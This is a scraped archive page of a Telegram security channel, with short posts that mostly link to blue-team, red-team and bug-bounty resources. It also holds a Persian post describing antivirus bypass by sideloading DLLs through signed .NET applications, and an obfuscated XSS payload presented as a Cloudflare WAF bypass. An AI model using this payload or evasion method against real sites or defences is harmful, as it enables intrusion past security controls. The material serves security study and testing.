Endi mavjud! Telegram Tadqiqoti 2025 — yilning asosiy insaytlari 
Network Security Channel
Kanalga Telegram’da o‘tish
⭕️Start Channel From 2017⭕️ ✅ Security Operation Center (SOC) ✅ Bug Bounty ✅ Vulnerability ✅ Pentest ✅ Hardening ✅ Linux ✅ Reasearch ✅ Security Network ✅ Security Researcher ✅ DevSecOps ✅ Blue Team ✅ Red Team
Ko'proq ko'rsatish2 811
Obunachilar
+1124 soatlar
+217 kunlar
+6230 kunlar
Postlar arxiv
A very complete collection of cheatsheet for #blue_team operations
#cheatsheet
Dm for copyright violations
@Engineer_Computer
Top Event codes
Dm for copyright violations
#book #event_code
@Engineer_Computer
#NIST
Cybersecurity for satellites
#space #satellite
@Engineer_Computer
#book
Top C&C Methods
#C_and_C #C2
Dm for copyright violations
@Engineer_Computer
⭕️ افزونه ی مرورگر AI nuclei
قبلا سرویس Nuclei AI رو در کانال معرفی کرده بودیم.
حال، افزونه Nuclei AI میتواند با انتخاب کردن متن CVE های جدید در توییتر (یا صفحات وب دیگر) از سرویس Nuclei AI استفاده کند و تمپلیت nuclei مورد نظر را بسازد.
اپشن های این افزونه عبارتند از:
- تبدیل گزارش باگ بانتی HackerOne به تمپلیت Nuclei ( همچنین پشتیبانی برای پلتفرم های دیگر مانند BugCrowd / Intigriti / Synack نیز اضافه میشود )
- تبدیل اکسپلویت های ExploitDB به تمپلیت Nuclei
لینک افزونه:
🔗 https://github.com/projectdiscovery/nuclei-ai-extension
#nuclei #automation
@Engineer_Computer
⭕️ یکی از راه های دور زدن execution policy و AV ها استفاده از فایل های SIGN شده توسط کمپانی های معتبر است.
در لینک زیر یک لیست مناسب از Net Application. های مورد تایید Microsoft جمع آوری شده ، که ما میتوانیم با استفاده از فایل های Config. فایل های DLL را فراخوانی کنیم به طوری که از قبل مورد تایید قرار گرفته باشد.
https://github.com/Mr-Un1k0d3r/.NetConfigLoader
#RedTeam #MalDev
@Engineer_Computer
RCE of Burp Scanner / Crawler via Clickjacking
https://hackerone.com/reports/1274695
@Engineer_Computer
🗒 3 tricks to bypass Cloudflare WAF in file upload
https://medium.com/numen-cyber-labs/3-tricks-to-bypass-cloudflare-waf-in-file-upload-9abb83530cfc
@Engineer_Computer
🗒 Telegram bug bounties XSS, privacy issues, official bot exploitation
https://davtur19.medium.com/telegram-bug-bounties-xss-privacy-issues-official-bot-exploitation-and-more-5277fa78435
@Engineer_Computer
🗒 Cloudflare bypass WAF
Payload:
<inpuT autofocus oNFocus="setTimeout(function() { /*\*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\*/ }, 5000);"></inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT;
@Engineer_Computer
سوء استفاده از ابزار سرویس سرتیفیکیت اکتیو
https://www.blackhillsinfosec.com/abusing-active-directory-certificate-services-part-3/
@Engineer_Computer
